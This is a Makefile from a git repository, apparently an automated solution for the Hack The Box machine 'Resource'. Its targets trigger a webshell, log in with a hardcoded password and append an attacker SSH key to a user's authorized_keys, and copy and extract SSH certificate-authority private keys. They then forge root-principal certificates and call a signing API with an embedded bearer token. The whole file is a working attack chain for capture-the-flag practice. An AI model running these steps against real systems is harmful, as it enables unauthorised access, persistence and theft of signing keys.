htb-season-6-resource

Recipes for HTB Season 6 "Resource"
git clone https://git.y5c4l3.net/htb-season-6-resource.git
Log | Files | Refs | README | LICENSE

Makefile (2176B)

      1 SELF := ./keys/id_self
      2 OLDCA := ./itrc/ca-itrc
      3 SSGCA := ./ssg/ca-it
      4 
      5 ATTACHMENTS := ./itrc/itrc.ssg.htb.har \
      6                ./itrc/id_bmcgregor.pub \
      7                ./itrc/id_mgraham.pub
      8 
      9 .PHONY: clean webshell mitrc oldcasign remotesign ssgcasign
     10 
     11 all: key
     12 
     13 webshell:
     14 	python3 itrc.py
     15 
     16 key: $(SELF)
     17 $(SELF):
     18 	ssh-keygen -t ed25519 -q -N '' -C 'recipe@y5' -f "$@"
     19 
     20 attachments: $(ATTACHMENTS)
     21 
     22 itrc/itrc.ssg.htb.har: itrc/c2f4813259cc57fab36b311c5058cf031cb6eb51.zip
     23 	unzip $< -d ./itrc
     24 	touch $@
     25 itrc/id_bmcgregor.pub: itrc/eb65074fe37671509f24d1652a44944be61e4360.zip
     26 	unzip $< -d ./itrc
     27 	mv ./itrc/id_ed25519.pub $@
     28 	touch $@
     29 itrc/id_mgraham.pub: itrc/e8c6575573384aeeab4d093cc99c7e5927614185.zip
     30 	unzip $< -d ./itrc
     31 	mv ./itrc/id_rsa.pub $@
     32 	touch $@
     33 
     34 itrc/%.zip:
     35 	wget -O "$@" http://itrc.ssg.htb/uploads/$(shell basename "$@")
     36 
     37 mitrcauth: key
     38 	echo 82yards2closeit
     39 	ssh msainristil@itrc.ssg.htb 'mkdir -p .ssh; echo $(shell cat $(SELF).pub) >> .ssh/authorized_keys'
     40 
     41 oldca: $(OLDCA) $(OLDCA).pub
     42 itrc/ca-%:
     43 	scp -F ssh_config mitrc:~/decommission_old_ca/$(shell basename "$@") ./itrc
     44 
     45 oldcasign: key oldca
     46 	ssh-keygen \
     47 		-s ./$(OLDCA) \
     48 		-I root@ssg.htb \
     49 		-n zzinter,msainristil,root \
     50 		-z 10086 \
     51 		-V -365d:+365d \
     52 		$(SELF)
     53 	mv $(SELF)-cert.pub $(SELF)-itrc.pub
     54 
     55 REMOTE_PRINCIPALS := webserver,analytics,support,security,zzinter_temp
     56 remotesign: $(SELF)-remote.pub
     57 $(SELF)-remote.pub: $(SELF)
     58 	curl http://signserv.ssg.htb/v1/sign \
     59 		-d '{"pubkey": "'"$(shell cat $(SELF).pub)"'", "username": "'"root@ssg.htb"'", "principals": "'"$(REMOTE_PRINCIPALS)"'"}' \
     60 		-H "Content-Type: application/json" \
     61 		-H "Authorization:Bearer 7Tqx6owMLtnt6oeR2ORbWmOPk30z4ZH901kH6UUT6vNziNqGrYgmSve5jCmnPJDE" \
     62 		-o $(SELF)-remote.pub
     63 
     64 ssgcaprobe: $(SSGCA) $(SSGCA).pub
     65 $(SSGCA).pub:
     66 	scp -F ssh_config support@ssg:/etc/ssh/ca-it.pub $@
     67 $(SSGCA): probe.sh
     68 	cat probe.sh | ssh -F ssh_config zzinter@ssg 'sh' > $@
     69 	echo >> $@
     70 	chmod 600 $@
     71 
     72 ssgcasign: ssgcaprobe
     73 	ssh-keygen \
     74 		-s $(SSGCA) \
     75 		-I root@ssg.htb \
     76 		-n webserver,analytics,support,security,zzinter_temp,root_user \
     77 		-z 10086 \
     78 		-V -365d:+365d \
     79 		$(SELF)
     80 	mv $(SELF)-cert.pub $(SELF)-ssg.pub
     81 
     82 clean:
     83 	rm $(SELF)
     84